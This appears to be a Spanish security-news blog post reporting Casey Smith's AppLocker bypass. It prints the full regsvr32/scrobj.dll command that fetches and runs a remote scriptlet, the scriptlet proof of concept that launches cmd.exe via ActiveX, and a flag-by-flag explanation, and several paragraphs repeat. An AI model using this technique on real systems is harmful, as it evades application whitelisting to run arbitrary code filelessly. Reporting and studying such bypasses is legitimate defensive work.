Saltear Windows AppLocker con un twit
Recientemente un investigador de seguridad llamado Casey Smith ha encontrado (@subtee) una forma bastante simple que puede evadir las restricciones de AppLocker mendiante el fetcher HTTP.
Véase el siguiente comando para Windows 10 Enterprise que cabe en un tweet:
El truco (Smith no ha querido llamarlo exploit) es limpio, ya que no toca el registro, no necesita derechos de administrador, puede ser "envuelto" en una sesión HTTP cifrada y no deja ningún rastro en el disco ya que lo descarga a memoria.
Por el momento, no existe un parche para esto y Smith ha creado una colección de Proof-of-Concept para ejecutar distintos tipos de scripts (y shells) en el equipo víctima.
Fuente: The Register | HackPlayers
Véase el siguiente comando para Windows 10 Enterprise que cabe en un tweet:
regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll
Regsvr32 es parte del sistema operativo y se puede utilizar para registrar y des-registrar Scripts COM con el registro de Windows.- /s le dice a regsvr32 que se ejecute en silencio;
- mediante /n no usaremos DllRegisterServer;
- /i pasa un parámetro opcional (nuestra URL) para DllInstall;
- /u significa que estamos tratando de anular el registro de un objeto y;
- scrobj.dll es el Script Component Runtime de Microsoft.
[scriptlet]
[registration classid="{F0001111-0000-0000-0000-0000FEEDACDC}" nbsp="" progid="Empire"]
[!-- Proof Of Concept - Casey Smith @subTee --]
[script language="JScript"]
[![CDATA[
[span style="background-color: #ffe599;"]var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");[/span]
]]]
[/script]
[/registration]
[/scriptlet]
El Javascript embebido utiliza ActiveX para abrir una consola de comandos. Si cambiamos cmd.exe por cualquier otro programa que no esté en la lista blanca de AppLocker... ¡se ejecutará!
<
El truco (Smith no ha querido llamarlo exploit) es limpio, ya que no toca el registro, no necesita derechos de administrador, puede ser "envuelto" en una sesión HTTP cifrada y no deja ningún rastro en el disco ya que lo descarga a memoria.
Por el momento, no existe un parche para esto y Smith ha creado una colección de Proof-of-Concept para ejecutar distintos tipos de scripts (y shells) en el equipo víctima.
Fuente: The Register | HackPlayers
0 Comments:
Publicar un comentario
Gracias por dejar un comentario en Segu-Info.
Gracias por comentar!